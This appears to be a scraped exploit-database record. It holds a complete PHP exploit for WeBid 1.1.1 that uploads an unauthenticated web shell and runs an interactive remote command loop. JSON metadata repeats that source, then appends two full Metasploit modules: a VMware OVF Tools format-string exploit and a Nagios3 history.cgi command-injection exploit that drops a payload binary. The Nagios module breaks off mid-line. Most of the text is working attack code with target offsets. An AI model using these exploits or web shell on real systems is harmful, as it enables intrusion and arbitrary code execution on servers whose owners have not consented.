ID 1337DAY-ID-23323
Type zdt
Reporter CWH Underground
Modified 2015-02-23T00:00:00
Description
Exploit for php platform in category web applications
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit
Date : 20 February 2015
Exploit Author : CWH Underground
Site : www.2600.in.th
Vendor Homepage : http://www.webidsupport.com/
Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
Version : 1.1.1
Tested on : Windows and Linux
#####################################################
VULNERABILITY: Arbitrary File Upload Vulnerability
#####################################################
/ajax.php
/inc/plupload/examples/upload.php
#####################################################
DESCRIPTION
#####################################################
This exploits a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
#####################################################
EXPLOIT
#####################################################
*/
// Runtime setup for the command-line client. PHP warnings are silenced, so a
// failed socket call produces no diagnostic beyond the script's own die()
// messages; the execution time limit is removed because the interactive loop
// below runs until the user types "exit"; socket reads give up after 5 s.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
/**
 * Send one raw HTTP request to port 80 of $host and return the whole reply.
 *
 * Terminates the script with a message on stdout when the TCP connection
 * cannot be established. The socket is never closed explicitly.
 *
 * @param string $host   target host name or IP address
 * @param string $packet complete request bytes (request line, headers, body)
 * @return string response bytes read until the peer closes the connection
 */
function http_send($host, $packet)
{
    $conn = fsockopen($host, 80);
    if ($conn === false) {
        die("\n[-] No response from {$host}:80\n");
    }
    fwrite($conn, $packet);
    $reply = stream_get_contents($conn);
    return $reply;
}
// Banner.
print "\n+----------------------------------------+";
print "\n| WeBid Unrestricted File Upload Exploit |";
print "\n+----------------------------------------+\n";
// Two positional arguments are required: the target host and the web path of
// the WeBid install. The path is concatenated directly with "ajax.php" and
// "uploaded/" below, so the examples end in "/".
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /WeBid/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
// multipart/form-data body with two parts: a "name" field and a "file" part
// whose filename is shell.php. The file content is a one-line PHP stager that
// prints the marker "___" and passes the base64-decoded value of the "Cmd"
// request header to passthru(). No credentials or tokens are sent with it.
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
$payload .= "shell.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
// Upload request against the auction-image upload action of ajax.php. The
// PHPSESSID value "cwh" is chosen by the client; the retrieval path used
// later ("uploaded/cwh/") suggests the server derives the upload directory
// from the session id — TODO confirm against the WeBid source.
// Detection note: an unauthenticated POST to ajax.php?do=uploadaucimages
// carrying a ".php" filename, and any request bearing a "Cmd:" header, are
// the observable indicators of this activity.
$packet = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Cookie: PHPSESSID=cwh"."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
// The sleeps are cosmetic; the upload is the single http_send() call below,
// whose response is discarded.
print "\n\nExploiting...";
sleep(2);
print "Waiting for shell...\n";
sleep(2);
http_send($host, $packet);
// Request template for the dropped file. "%s" is filled by sprintf() in the
// loop below with the base64-encoded command.
$packet = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
// Interactive loop: read a line from stdin, send it in the "Cmd" header and
// print whatever follows the "___" marker in the response. Typing "exit"
// ends the loop; a response without the marker terminates the script.
// Note the loose "==" comparison: an EOF on stdin yields "" here, not "exit".
while(1)
{
print "\nWebid-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>
{"published": "2015-02-23T00:00:00", "id": "1337DAY-ID-23323", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T04:00:54", "bulletin": {"published": "2015-02-23T00:00:00", "id": "1337DAY-ID-23323", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T04:00:54"}}, "hash": "6dd2541cf9372a4a9d511e92f212cbdc47009206584f181e40420eb90d61984d", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T04:00:54", "edition": 1, "title": "WeBid 1.1.1 Unrestricted File Upload Exploit", "href": "http://0day.today/exploit/description/23323", "modified": "2015-02-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/23323", "references": [], "reporter": "CWH Underground", "sourceData": "<?php\r\n \r\n/*\r\n \r\n ,--^----------,--------,-----,-------^--,\r\n | ||||||||| `--------' | O .. 
CWH Underground Hacking Team ..\r\n `+---------------------------^----------|\r\n `\\_,-------, _________________________|\r\n / XXXXXX /`| /\r\n / XXXXXX / `\\ /\r\n / XXXXXX /\\______(\r\n / XXXXXX / \r\n / XXXXXX /\r\n (________( \r\n `------'\r\n \r\n Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit\r\n Date : 20 February 2015\r\n Exploit Author : CWH Underground\r\n Site : www.2600.in.th\r\n Vendor Homepage : http://www.webidsupport.com/\r\n Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download\r\n Version : 1.1.1\r\n Tested on : Window and Linux\r\n \r\n \r\n#####################################################\r\nVULNERABILITY: Arbitrary File Upload Vulnerability\r\n#####################################################\r\n \r\n/ajax.php\r\n/inc/plupload/examples/upload.php\r\n \r\n#####################################################\r\nDESCRIPTION\r\n#####################################################\r\n \r\nThis exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. 
Attackers can abuse the\r\nupload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\r\n \r\n#####################################################\r\nEXPLOIT\r\n#####################################################\r\n \r\n*/\r\n \r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n \r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die(\"\\n[-] No response from {$host}:80\\n\");\r\n \r\n fputs($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n \r\nprint \"\\n+----------------------------------------+\";\r\nprint \"\\n| WeBid Unrestricted File Upload Exploit |\";\r\nprint \"\\n+----------------------------------------+\\n\";\r\n \r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /WeBid/\\n\";\r\n die();\r\n}\r\n \r\n$host = $argv[1];\r\n$path = $argv[2];\r\n \r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"name\\\"\\r\\n\\r\\n\";\r\n$payload .= \"shell.php\\r\\n\";\r\n$payload .= \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"shell.php\\\"\\r\\n\";\r\n$payload .= \"Content-Type: application/octet-stream\\r\\n\\r\\n\";\r\n$payload .= \"<?php error_reporting(0); print(___); passthru(base64_decode(\\$_SERVER[HTTP_CMD]));\\r\\n\";\r\n$payload .= \"--o0oOo0o--\\r\\n\";\r\n \r\n$packet = \"POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Cookie: PHPSESSID=cwh\".\"\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n \r\nprint 
\"\\n\\nExploiting...\";\r\nsleep(2);\r\nprint \"Waiting for shell...\\n\";\r\nsleep(2);\r\n \r\nhttp_send($host, $packet);\r\n \r\n$packet = \"GET {$path}uploaded/cwh/shell.php HTTP/1.1\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\n print \"\\n ,--^----------,--------,-----,-------^--, \\n\";\r\n print \" | ||||||||| `--------' | O \\n\";\r\n print \" `+---------------------------^----------| \\n\";\r\n print \" `\\_,-------, _________________________| \\n\";\r\n print \" / XXXXXX /`| / \\n\";\r\n print \" / XXXXXX / `\\ / \\n\";\r\n print \" / XXXXXX /\\______( \\n\";\r\n print \" / XXXXXX / \\n\";\r\n print \" / XXXXXX / .. CWH Underground Hacking Team .. \\n\";\r\n print \" (________( \\n\";\r\n print \" `------' \\n\";\r\n \r\nwhile(1)\r\n{\r\n print \"\\nWebid-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n $response = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n preg_match('/___(.*)/s', $response, $m) ? 
print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n \r\n################################################################################################################\r\n# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2\r\n################################################################################################################\r\n?>\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "e8e10e8dc7892cd9e20cd3e287a87ad8", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6fadd98b78cee69faa608ac7283c958d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "1ed64e57d6f6b350c890095efe94b7cc", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9e864242aef94fd273fa0c68ff07fa6a", "key": "reporter"}, {"hash": "6fadd98b78cee69faa608ac7283c958d", "key": "modified"}, {"hash": "0b25d9cd7d7d4c2242183904b14b2529", "key": "href"}, {"hash": "c0b6cdeaaa5f0020227c655f7d44f16b", "key": "sourceHref"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "abd44e66626a0511ff4559cb0ba776f0850db8fd355be3c696887e5f551b8c7e", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-02-10T11:41:56"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23323", "SECURITYVULNS:VULN:10670"]}, {"type": "zdt", "idList": ["1337DAY-ID-8289"]}], "modified": "2018-02-10T11:41:56"}, "vulnersScore": -0.0}, "type": "zdt", "lastseen": "2018-02-10T11:41:56", "edition": 2, "title": "WeBid 1.1.1 Unrestricted File Upload Exploit", "href": "https://0day.today/exploit/description/23323", "modified": 
"2015-02-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 86, "cvelist": [], "sourceHref": "https://0day.today/exploit/23323", "references": [], "reporter": "CWH Underground", "sourceData": "<?php\r\n \r\n/*\r\n \r\n ,--^----------,--------,-----,-------^--,\r\n | ||||||||| `--------' | O .. CWH Underground Hacking Team ..\r\n `+---------------------------^----------|\r\n `\\_,-------, _________________________|\r\n / XXXXXX /`| /\r\n / XXXXXX / `\\ /\r\n / XXXXXX /\\______(\r\n / XXXXXX / \r\n / XXXXXX /\r\n (________( \r\n `------'\r\n \r\n Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit\r\n Date : 20 February 2015\r\n Exploit Author : CWH Underground\r\n Site : www.2600.in.th\r\n Vendor Homepage : http://www.webidsupport.com/\r\n Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download\r\n Version : 1.1.1\r\n Tested on : Window and Linux\r\n \r\n \r\n#####################################################\r\nVULNERABILITY: Arbitrary File Upload Vulnerability\r\n#####################################################\r\n \r\n/ajax.php\r\n/inc/plupload/examples/upload.php\r\n \r\n#####################################################\r\nDESCRIPTION\r\n#####################################################\r\n \r\nThis exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. 
Attackers can abuse the\r\nupload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\r\n \r\n#####################################################\r\nEXPLOIT\r\n#####################################################\r\n \r\n*/\r\n \r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n \r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die(\"\\n[-] No response from {$host}:80\\n\");\r\n \r\n fputs($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n \r\nprint \"\\n+----------------------------------------+\";\r\nprint \"\\n| WeBid Unrestricted File Upload Exploit |\";\r\nprint \"\\n+----------------------------------------+\\n\";\r\n \r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /WeBid/\\n\";\r\n die();\r\n}\r\n \r\n$host = $argv[1];\r\n$path = $argv[2];\r\n \r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"name\\\"\\r\\n\\r\\n\";\r\n$payload .= \"shell.php\\r\\n\";\r\n$payload .= \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"shell.php\\\"\\r\\n\";\r\n$payload .= \"Content-Type: application/octet-stream\\r\\n\\r\\n\";\r\n$payload .= \"<?php error_reporting(0); print(___); passthru(base64_decode(\\$_SERVER[HTTP_CMD]));\\r\\n\";\r\n$payload .= \"--o0oOo0o--\\r\\n\";\r\n \r\n$packet = \"POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Cookie: PHPSESSID=cwh\".\"\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n \r\nprint 
\"\\n\\nExploiting...\";\r\nsleep(2);\r\nprint \"Waiting for shell...\\n\";\r\nsleep(2);\r\n \r\nhttp_send($host, $packet);\r\n \r\n$packet = \"GET {$path}uploaded/cwh/shell.php HTTP/1.1\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\n print \"\\n ,--^----------,--------,-----,-------^--, \\n\";\r\n print \" | ||||||||| `--------' | O \\n\";\r\n print \" `+---------------------------^----------| \\n\";\r\n print \" `\\_,-------, _________________________| \\n\";\r\n print \" / XXXXXX /`| / \\n\";\r\n print \" / XXXXXX / `\\ / \\n\";\r\n print \" / XXXXXX /\\______( \\n\";\r\n print \" / XXXXXX / \\n\";\r\n print \" / XXXXXX / .. CWH Underground Hacking Team .. \\n\";\r\n print \" (________( \\n\";\r\n print \" `------' \\n\";\r\n \r\nwhile(1)\r\n{\r\n print \"\\nWebid-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n $response = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n preg_match('/___(.*)/s', $response, $m) ? 
print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n \r\n################################################################################################################\r\n# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2\r\n################################################################################################################\r\n?>\n\n# 0day.today [2018-02-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "d7c716b01e4a30936ae14d7702d65758", "key": "href"}, {"hash": "6fadd98b78cee69faa608ac7283c958d", "key": "modified"}, {"hash": "6fadd98b78cee69faa608ac7283c958d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9e864242aef94fd273fa0c68ff07fa6a", "key": "reporter"}, {"hash": "09e768e27ba2bce3f18df949afdfb5e4", "key": "sourceData"}, {"hash": "528bfefe9bd6e837e105252accd5d684", "key": "sourceHref"}, {"hash": "e8e10e8dc7892cd9e20cd3e287a87ad8", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-03T11:28:13", "bulletinFamily": "exploit", "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.\n", "modified": "2017-07-24T13:26:21", "published": "2013-02-04T15:37:42", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/OVFTOOL_FORMAT_STRING", "href": "", "type": "metasploit", "title": "VMWare OVF Tools Format String Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'VMWare OVF Tools Format String Vulnerability',\n 'Description' => %q{\n This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. 
The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jeremy Brown', # Vulnerability discovery\n 'juan vazquez' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-3569' ],\n [ 'OSVDB', '87117' ],\n [ 'BID', '56468' ],\n [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'BadChars' =>\n (0x00..0x08).to_a.pack(\"C*\") +\n \"\\x0b\\x0c\\x0e\\x0f\" +\n (0x10..0x1f).to_a.pack(\"C*\") +\n (0x80..0xff).to_a.pack(\"C*\") +\n \"\\x22\",\n 'StackAdjustment' => -3500,\n 'PrependEncoder' => \"\\x54\\x59\", # push esp # pop ecx\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'ECX',\n 'BufferOffset' => 6\n }\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # vmware-ovftool-2.1.0-467744-win-i386.msi\n [ 'VMWare OVF Tools 2.1 on Windows XP SP3',\n {\n 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1\n 'AddrPops' => 98,\n 'StackPadding' => 38081,\n 'Alignment' => 4096\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Nov 08 2012',\n 'DefaultTarget' => 0))\n\n end\n\n def ovf\n my_payload = rand_text_alpha(4) # ebp\n my_payload << [target.ret].pack(\"V\") # eip # call esp\n my_payload << payload.encoded\n\n fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)\n fs << rand_text_alpha(target['Alignment']) # Align to 0x11000\n fs << my_payload\n # 65536 => 0x10000\n # 27 => Error message prefix length\n fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))\n fs << \"%08x\" * target['AddrPops'] # Reach saved EBP\n fs << \"%hn\" # Overwrite LSW of saved EBP with 0x1000\n\n ovf_file = <<-EOF\n<?xml version=\"1.0\" 
encoding=\"UTF-8\"?>\n<Envelope vmw:buildId=\"build-162856\" xmlns=\"http://schemas.dmtf.org/ovf/envelope/1\"\nxmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\"\nxmlns:ovf=\"http://schemas.dmtf.org/ovf/envelope/1\"\nxmlns:rasd=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData\"\nxmlns:vmw=\"http://www.vmware.com/schema/ovf\"\nxmlns:vssd=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData\"\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n <References>\n <File ovf:href=\"Small VM-disk1.vmdk\" ovf:id=\"file1\" ovf:size=\"68096\" />\n </References>\n <DiskSection>\n <Info>Virtual disk information</Info>\n <Disk ovf:capacity=\"8\" ovf:capacityAllocationUnits=\"#{fs}\" ovf:diskId=\"vmdisk1\" ovf:fileRef=\"file1\" ovf:format=\"http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized\" />\n </DiskSection>\n <VirtualSystem ovf:id=\"Small VM\">\n <Info>A virtual machine</Info>\n </VirtualSystem>\n</Envelope>\n EOF\n ovf_file\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n\n if agent !~ /VMware-client/ or agent !~ /ovfTool/\n print_status(\"User agent #{agent} not recognized, answering Not Found...\")\n send_not_found(cli)\n end\n\n if uri =~ /.mf$/\n # The manifest file isn't required\n print_status(\"Sending Not Found for Manifest file request...\")\n send_not_found(cli)\n end\n\n print_status(\"Sending OVF exploit...\")\n send_response(cli, ovf, {'Content-Type'=>'text/xml'})\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ovftool_format_string.rb"}, {"lastseen": "2019-11-03T11:27:59", "bulletinFamily": "exploit", "description": "This module abuses a command injection vulnerability in the Nagios3 history.cgi script.\n", "modified": "2018-08-20T20:43:07", "published": 
"2013-01-15T14:32:32", "id": "MSF:EXPLOIT/UNIX/WEBAPP/NAGIOS3_HISTORY_CGI", "href": "", "type": "metasploit", "title": "Nagios3 history.cgi Host Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios3 history.cgi Host Command Execution',\n 'Description' => %q{\n This module abuses a command injection vulnerability in the\n Nagios3 history.cgi script.\n },\n 'Author' => [\n 'Unknown <temp66[at]gmail.com>',\t\t # Original finding\n 'blasty <blasty[at]fail0verflow.com>',\t # First working exploit\n 'Jose Selvi <jselvi[at]pentester.es>',\t # Metasploit module\n 'Daniele Martini <cyrax[at]pkcrew.org>'\t# Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-6096' ],\n [ 'OSVDB', '88322' ],\n [ 'BID', '56879' ],\n [ 'EDB', '24084' ]\n ],\n 'Platform' => %w{ linux unix },\n 'Arch' => [ ARCH_X86 ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 200,\t# Due to a system() parameter length limitation\n 'BadChars' => '',\t# It'll be base64 encoded\n },\n 'Targets' =>\n [\n [ 'Automatic Target', { 'auto' => true }],\n # NOTE: All addresses are from the history.cgi binary\n [ 'Appliance Nagios XI 2012R1.3 (CentOS 6.x)',\n {\n 'BannerRE' => 'Apache/2.2.15 (CentOS)',\n 'VersionRE' => '3.4.1',\n 'Arch' => ARCH_X86,\n 'Offset' => 0xc43,\n 'RopStack' =>\n [\n 0x0804c260,\t# unescape_cgi_input()\n 0x08048f04,\t# pop, ret\n 0x08079b60,\t# buffer addr\n 0x08048bb0,\t# system()\n 0x08048e70,\t# exit()\n 0x08079b60\t# buffer addr\n ]\n }\n ],\n [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)',\n {\n 'BannerRE' => 'Apache/2.2.9 (Debian)',\n 'VersionRE' => '3.0.6',\n 'Arch' => ARCH_X86,\n 'Offset' => 0xc37,\n 
'RopStack' =>\n [\n 0x0804b620,\t# unescape_cgi_input()\n 0x08048fe4,\t# pop, ret\n 0x080727a0,\t# buffer addr\n 0x08048c7c,\t# system()\n 0xdeafbabe,\t# if should be exit() but it's not\n 0x080727a0\t# buffer addr\n ]\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 09 2012'))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, \"The full URI path to history.cgi\", \"/nagios3/cgi-bin/history.cgi\"]),\n OptString.new('USER', [true, \"The username to authenticate with\", \"nagiosadmin\"]),\n OptString.new('PASS', [true, \"The password to authenticate with\", \"nagiosadmin\"]),\n ])\n end\n\n def detect_version(uri)\n # Send request\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri,\n 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64(\"#{datastore['USER']}:#{datastore['PASS']}\") },\n }, 10)\n\n # Error handling\n if res.nil?\n print_error(\"Unable to get a response from the server\")\n return nil, nil\n end\n if(res.code == 401)\n print_error(\"Please specify correct values for USER and PASS\")\n return nil, nil\n end\n if(res.code == 404)\n print_error(\"Please specify the correct path to history.cgi in the URI parameter\")\n return nil, nil\n end\n\n # Extract banner from response\n banner = res.headers['Server']\n\n # Extract version from body\n version = nil\n version_line = res.body.match(/Nagios® (Core™ )?[0-9.]+ -/)\n if not version_line.nil?\n version = version_line[0].match(/[0-9.]+/)[0]\n end\n\n # Check in an alert exists\n alert = res.body.match(/ALERT/)\n\n return version, banner, alert\n end\n\n def select_target(version, banner)\n\n # No banner and version, no target\n if banner.nil? or version.nil?\n return nil\n end\n\n # Get version information\n print_status(\"Web Server banner: #{banner}\")\n print_status(\"Nagios version detected: #{version}\")\n\n # Try regex for each target\n self.targets.each do |t|\n if t['BannerRE'].nil? or t['VersionRE'].nil? 
# It doesn't exist in Auto Target\n next\n end\n regexp1 = Regexp.escape(t['BannerRE'])\n regexp2 = Regexp.escape(t['VersionRE'])\n if ( banner =~ /#{regexp1}/ and version =~ /#{regexp2}/ ) then\n return t\n end\n end\n # If not detected, return nil\n return nil\n end\n\n def check\n print_status(\"Checking banner and version...\")\n # Detect version\n banner, version, alert = detect_version(target_uri.path)\n # Select target\n mytarget = select_target(banner, version)\n\n if mytarget.nil?\n vprint_error(\"No matching target\")\n return CheckCode::Unknown\n end\n\n if alert.nil?\n vprint_error(\"At least one ALERT is needed in order to exploit\")\n return CheckCode::Detected\n end\n\n return CheckCode::Appears\n end\n\n def exploit\n # Automatic Targeting\n mytarget = nil\n banner, version, alert = detect_version(target_uri.path)\n if (target['auto'])\n print_status(\"Automatically detecting the target...\")\n mytarget = select_target(banner, version)\n if mytarget.nil?\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n else\n mytarget = target\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n if alert.nil?\n print_error(\"At least one ALERT is needed in order to exploit, none found in the first page, trying anyway...\")\n end\n print_status(\"Sending request to http://#{rhost}:#{rport}#{target_uri.path}\")\n\n # Generate a payload ELF to execute\n elfbin = generate_payload_exe\n elfb64 = Rex::Text.encode_base64(elfbin)\n\n # Generate random filename\n tempfile = '/tmp/' + rand_text_alphanumeric(10)\n\n # Generate command-line execution\n if mytarget.name =~ /CentOS/\n cmd = \"echo #{elfb64}|base64 -d|tee #{tempfile};chmod 700 #{tempfile};rm -rf #{tempfile}|#{tempfile};\"\n else\n cmd = \"echo #{elfb64}|base64 -d|tee #{tempfile} |chmod 